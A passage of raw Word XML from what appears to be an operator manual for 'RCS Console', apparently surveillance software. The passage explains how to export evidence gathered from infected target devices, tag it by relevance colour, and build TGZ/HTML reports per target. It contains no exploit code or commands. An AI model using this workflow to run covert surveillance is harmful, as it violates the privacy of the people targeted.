              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to upload, upload and run or download files to/from the infected device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B47AFE" w:rsidRDefault="00B47AFE" w:rsidP="007A4857">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B47AFE" w:rsidRDefault="00B47AFE">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003571D2" w:rsidRPr="000B4CEE" w:rsidRDefault="003571D2" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc372642525"/>
      <w:r w:rsidRPr="000B4CEE">
        <w:lastRenderedPageBreak/>
        <w:t>Data Export, Tagging and Report Creation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="003571D2" w:rsidRDefault="003571D2" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003571D2" w:rsidRDefault="00CF4942" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Within RCS Console</w:t>
      </w:r>
      <w:r w:rsidR="00872B57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any data can be exported, individually or arranged.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="003571D2">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AB7596" w:rsidTr="00AB7596">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="00AB7596">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B92837">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5092BFC2" wp14:editId="28D3680B">
                  <wp:extent cx="1028700" cy="561975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>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028700" cy="561975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="00AB7596">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="000725C6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Download Evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> button allows </w:t>
            </w:r>
            <w:r w:rsidRPr="000725C6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to export the single evidence, in the corresponding format (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e.g. </w:t>
            </w:r>
            <w:r w:rsidRPr="000725C6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>text, image, audio).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="003571D2">
      <w:pPr>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AB7596" w:rsidTr="00AB7596">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="00AB7596">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A49D02B" wp14:editId="7CC3F263">
                  <wp:extent cx="638175" cy="552450"/>
                  <wp:effectExtent l="0" t="0" r="9525"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB7596">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The Add Report button let you add the evidence to a report, that you can export - from the Target section - once all the data of interest have been added.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB7596" w:rsidRDefault="00B575F8" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Each evidence details page also allows to add a specific level of relevance</w:t>
      </w:r>
      <w:r w:rsidR="00D274A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, useful for data filtering and report creation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This operation is called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00B575F8">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>agging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B92837" w:rsidRPr="00B92837" w:rsidRDefault="00B92837" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="25" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1503"/>
        <w:gridCol w:w="1462"/>
        <w:gridCol w:w="6638"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB7596" w:rsidTr="00F64671">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04" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="95B3D7" w:themeColor="accent1" w:themeTint="99"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Status </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="005D195C" w:rsidP="00F64671">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Color</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="00F64671">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AB7596" w:rsidTr="00AB759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AB7596" w:rsidRPr="00A05E51" w:rsidRDefault="00AB7596" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DFDCA9A" wp14:editId="0B16B75A">
                  <wp:extent cx="552450" cy="533400"/>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552450" cy="533400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRPr="005D195C" w:rsidRDefault="005D195C" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:i/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D195C">
              <w:rPr>
                <w:i/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>none</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00E558AB" w:rsidP="00F64671">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No relevance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB7596" w:rsidTr="00AB7596">
        <w:trPr>
          <w:trHeight w:val="1134"/>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AB7596" w:rsidRPr="00A05E51" w:rsidRDefault="00AB7596" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="870" w:dyaOrig="840">
                <v:shape id="_x0000_i1116" type="#_x0000_t75" style="width:43.5pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId352" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1116" DrawAspect="Content" ObjectID="_1446455331" r:id="rId353"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRPr="00A05E51" w:rsidRDefault="00E558AB" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Gray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00E558AB" w:rsidP="00F6467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Minimum relevance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB7596" w:rsidTr="00AB759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AB7596" w:rsidRDefault="00AB7596" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19CB7102" wp14:editId="233AA46C">
                  <wp:extent cx="552450" cy="533400"/>
                  <wp:effectExtent l="0" t="0" r="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552450" cy="533400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00E558AB" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Green</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00E558AB" w:rsidP="00F64671">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Normal relevance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB7596" w:rsidTr="00AB7596">
        <w:trPr>
          <w:trHeight w:val="1134"/>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AB7596" w:rsidRDefault="00AB7596" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BCA2BB9" wp14:editId="66BCCC2B">
                  <wp:extent cx="552450" cy="533400"/>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552450" cy="533400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00E558AB" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Yellow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00E558AB" w:rsidP="00F6467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Intermediate relevance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB7596" w:rsidTr="00AB759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04" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00AB7596" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56951D41" wp14:editId="02818513">
                  <wp:extent cx="552450" cy="5334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552450" cy="533400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00E558AB" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Red</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AB7596" w:rsidRDefault="00E558AB" w:rsidP="00F64671">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Maximum relevance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000C2BD7" w:rsidRDefault="000C2BD7" w:rsidP="003571D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C2BD7" w:rsidRDefault="000C2BD7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00757793" w:rsidRDefault="00757793" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Instead of exporting evidences one by one, you can press the Export Evidence button within any Target’s page in order to export data arranged.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00757793" w:rsidRDefault="00757793" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00757793" w:rsidRDefault="00757793" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The image below shows a sample windows, inside which you can select different filters in order to create a report that contains only relevant data for your investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C2BD7" w:rsidRDefault="000C2BD7" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C2BD7" w:rsidRDefault="000C2BD7" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3294289" cy="2562225"/>
            <wp:effectExtent l="0" t="0" r="1905"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307510" cy="2572508"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C2BD7" w:rsidRPr="003B0583" w:rsidRDefault="000C2BD7" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C2BD7" w:rsidRDefault="00117549" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.2</w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RCS </w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Console ] </w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="000C2BD7">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Export Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C2BD7" w:rsidRDefault="000C2BD7" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C2BD7" w:rsidRDefault="000C2BD7" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C2BD7" w:rsidRDefault="00E03B26" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The report file generated by RCS Console is in .TGZ format. Once extracted, you can find all selected/filtered data</w:t>
      </w:r>
      <w:r w:rsidR="003225E2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in HTML format: just open the </w:t>
      </w:r>
      <w:r w:rsidR="003225E2" w:rsidRPr="003225E2">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r w:rsidR="003225E2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and surf the data</w:t>
      </w:r>
      <w:r w:rsidR="00A70750">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within your browser, clicking on the data value (left column).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A70750" w:rsidRDefault="00A70750" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A70750" w:rsidRDefault="00A70750" w:rsidP="000C2BD7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
